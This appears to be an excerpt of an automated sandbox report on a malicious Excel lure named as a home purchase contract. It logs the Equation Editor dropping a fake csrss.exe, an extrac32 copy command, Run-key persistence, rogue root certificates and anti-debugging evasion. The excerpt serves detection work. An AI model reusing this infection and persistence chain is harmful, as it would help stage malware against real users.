                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D486A6 push E833DA64h; iretd 8_2_33D486AB
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C992FC push 02C99367h; ret 11_2_02C9935F
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C732FC push eax; ret 11_2_02C73338
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C8D204 push ecx; mov dword ptr [esp], edx11_2_02C8D209
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C7635C push 02C763B7h; ret 11_2_02C763AF
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C7635A push 02C763B7h; ret 11_2_02C763AF
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C990AC push 02C99125h; ret 11_2_02C9911D
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C991F8 push 02C99288h; ret 11_2_02C99280
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C99144 push 02C991ECh; ret 11_2_02C991E4
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C7672E push 02C76772h; ret 11_2_02C7676A
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C76730 push 02C76772h; ret 11_2_02C7676A
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C7C4E4 push ecx; mov dword ptr [esp], edx11_2_02C7C4E9
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C7D518 push 02C7D544h; ret 11_2_02C7D53C
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C7CB64 push 02C7CCEAh; ret 11_2_02C7CCE2
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C7CB63 push 02C7CCEAh; ret 11_2_02C7CCE2
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C868C0 push 02C8696Bh; ret 11_2_02C86963
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C87884 push 02C87901h; ret 11_2_02C878F9
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C868BE push 02C8696Bh; ret 11_2_02C86963
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C82ED8 push 02C82F4Eh; ret 11_2_02C82F46
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C87ED0 push 02C87F08h; ret 11_2_02C87F00
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C89E74 push 02C89EACh; ret 11_2_02C89EA4
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C82FE3 push 02C83031h; ret 11_2_02C83029
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C82FE4 push 02C83031h; ret 11_2_02C83029
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C97F60 push 02C98124h; ret 11_2_02C9811C
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C9CF18 push eax; ret 11_2_02C9CFE8
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C87C5C push 02C87C9Eh; ret 11_2_02C87C96
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C85DF4 push ecx; mov dword ptr [esp], edx11_2_02C85DF6
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_2D254E56 push ecx; ret 11_2_2D254E69
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_2D277A28 push eax; ret 11_2_2D277A46

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\qr-in.com\DavWWWRootJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\qr-in.com\DavWWWRootJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeFile created: C:\Users\Public\Libraries\Efftwcmk.PIFJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\csrss.exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\csrss.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\csrss.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\csrss[1].exeJump to dropped file
                  Source: C:\Windows\SysWOW64\extrac32.exeFile created: C:\Users\Public\Libraries\Efftwcmk.PIFJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D5AB0D OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,QueryServiceStatus,StartServiceW,8_2_33D5AB0D
                  Source: C:\Users\user\AppData\Roaming\csrss.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run EfftwcmkJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run EfftwcmkJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D75E5E GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,8_2_33D75E5E
                  Source: C:\Users\user\AppData\Roaming\csrss.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: Home Purchase Contract and Property Details.xlsStream path 'MBD00099100/Package' entropy: 7.95104444318 (max. 8.0)
                  Source: Home Purchase Contract and Property Details.xlsStream path 'Workbook' entropy: 7.99059170433 (max. 8.0)
                  Source: ~DF78F515A159E2AA69.TMP.0.drStream path 'Package' entropy: 7.94211196967 (max. 8.0)
                  Source: 0B430000.0.drStream path 'MBD00099100/Package' entropy: 7.94211196967 (max. 8.0)
                  Source: 0B430000.0.drStream path 'Workbook' entropy: 7.99751644532 (max. 8.0)
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C8CC9411_2_02C8CC94
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D4F7A7 Sleep,ExitProcess,8_2_33D4F7A7
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_11-53504
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,8_2_33D5A748
                  Source: C:\Users\user\AppData\Roaming\csrss.exeWindow / User API: threadDelayed 422Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeWindow / User API: threadDelayed 9260Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeWindow / User API: foregroundWindowGot 1733Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_8-33833
                  Source: C:\Users\user\AppData\Roaming\csrss.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_8-33857
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFAPI coverage: 10.0 %
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C8CC9411_2_02C8CC94
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3720Thread sleep time: -240000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exe TID: 3928Thread sleep time: -64000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exe TID: 3932Thread sleep time: -1266000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exe TID: 3956Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exe TID: 3932Thread sleep time: -27780000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D8E879 FindFirstFileExA,8_2_33D8E879
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D4C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_33D4C34D
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D4BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_33D4BB30
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D59AF5 FindFirstFileW,8_2_33D59AF5
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D5C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_33D5C291
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D4880C FindFirstFileW,FindNextFileW,FindClose,8_2_33D4880C
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D4783C FindFirstFileW,FindNextFileW,8_2_33D4783C
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D49665 FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_33D49665
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D4BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_33D4BD37
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C758B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,11_2_02C758B4
                  Source: C:\Users\user\AppData\Roaming\csrss.exeAPI call chain: ExitProcess graph end nodegraph_8-34198
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFAPI call chain: ExitProcess graph end nodegraph_11-53502
                  Source: C:\Users\user\AppData\Roaming\csrss.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeProcess queried: DebugFlagsJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFProcess queried: DebugPortJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFProcess queried: DebugFlagsJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFProcess queried: DebugPortJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFProcess queried: DebugFlagsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D7BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_33D7BB22
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D54D86 GetSystemDirectoryA,LoadLibraryA,LoadLibraryA,GetProcAddress,8_2_33D54D86
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D832B5 mov eax, dword ptr fs:[00000030h]8_2_33D832B5
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_2D2632B5 mov eax, dword ptr fs:[00000030h]11_2_2D2632B5
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02CB73AD mov eax, dword ptr fs:[00000030h]11_2_02CB73AD
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D52077 GetProcessHeap,HeapFree,8_2_33D52077
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D74B47 SetUnhandledExceptionFilter,8_2_33D74B47
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D7BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_33D7BB22
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D749F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_33D749F9
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D749F8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_33D749F8
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D74FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_33D74FDC
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_2D254FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_2D254FDC
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_2D25BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_2D25BB22
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D59627 mouse_event,8_2_33D59627
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\csrss.exe "C:\Users\user\AppData\Roaming\csrss.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeProcess created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\csrss.exe C:\\Users\\Public\\Libraries\\Efftwcmk.PIFJump to behavior
                  Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program Managery] [Compatibility Mode] - Microsoft Word
                  Source: csrss.exe, 00000008.00000002.1015314585.0000000052030000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLD\ini3dU
                  Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp, csrss.exe, 00000008.00000002.1007133666.000000000077F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: logs.dat.8.drBinary or memory string: [Program Manager]
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D74C52 cpuid 8_2_33D74C52
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: GetLocaleInfoW,8_2_33D92313
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: GetLocaleInfoW,8_2_33D888ED
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: EnumSystemLocalesW,8_2_33D92036
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: EnumSystemLocalesW,8_2_33D91F9B
